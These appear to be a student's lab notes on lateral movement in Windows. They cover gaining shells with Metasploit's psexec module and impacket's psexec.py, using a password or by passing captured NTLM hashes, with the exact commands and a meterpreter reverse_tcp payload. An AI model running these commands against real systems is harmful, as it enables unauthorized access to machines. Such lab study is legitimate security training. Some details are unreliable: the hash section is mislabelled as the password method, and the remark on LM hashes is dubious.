…..using the things that were found before (SAM Hashes)
Different ways:
- Through Metasploit - with a password
exploit/windows/smb/psexecNOISY - Through Metasploit - with a hash
exploit/windows/smb/psexecNOISY - Through psexec - with a password
psexec.py marvel.local/fcastle:'Password1';@<IP> - Through psexec - with a hash
psexec.py administrator@<IP> -hashes LM:NT
How I went about it
Metasploit method using password
-
load msfconsole
-
searched
psexec -
chose
exploit/windows/smb/psexec -
made sure payload is for windows x64. It was not, so in msfconsole =>
set payload windows/x64/meterpreter/reverse_tcp -
I am attacking fcastle so……need to set options accordingly
-
for targets, it was set to
automatic, butNative uploadworks best and so doesPowershell
MOF upload and Command do not work (it seems)
-
Run
Note:
Shells can be backgrounded using background command while in shell
and to return to the shell, check the current running sessions by typing sessions and selecting the session. E.g. sessions 1
Note:
There are 2 parts of any hash - NT and LM
- If cracking passwords, usually only the LM part is required
- But when doing relays or passing the hash, both the parts sepeated by
:is required
Metasploit method using password
-
implemented similarly as the last one
-
a few changes in the
msfconsolewere required tho -
smbuser needs to be set to administrator
-
no smbdomain is required this time
-
put the hash in smbpass
-
HENCE THERE WAS NO NEED TO CRACK THE PASSWORD
-
got local admin shell because of password reuse
PSEXEC.PY method using password
PSEXEC.PY method using hash
Note:
other programs are also available
if psexec.py doesn’t work
wmiexecsmbexecworks exactly like psexec
!!! SHELLS ARE NOT NECESSARILY NEEDED TO SUCCESSFULLY PWN A MACHINE JUST SOMETHING TO HAVE IN CASE THAT IS REQUIRED !!!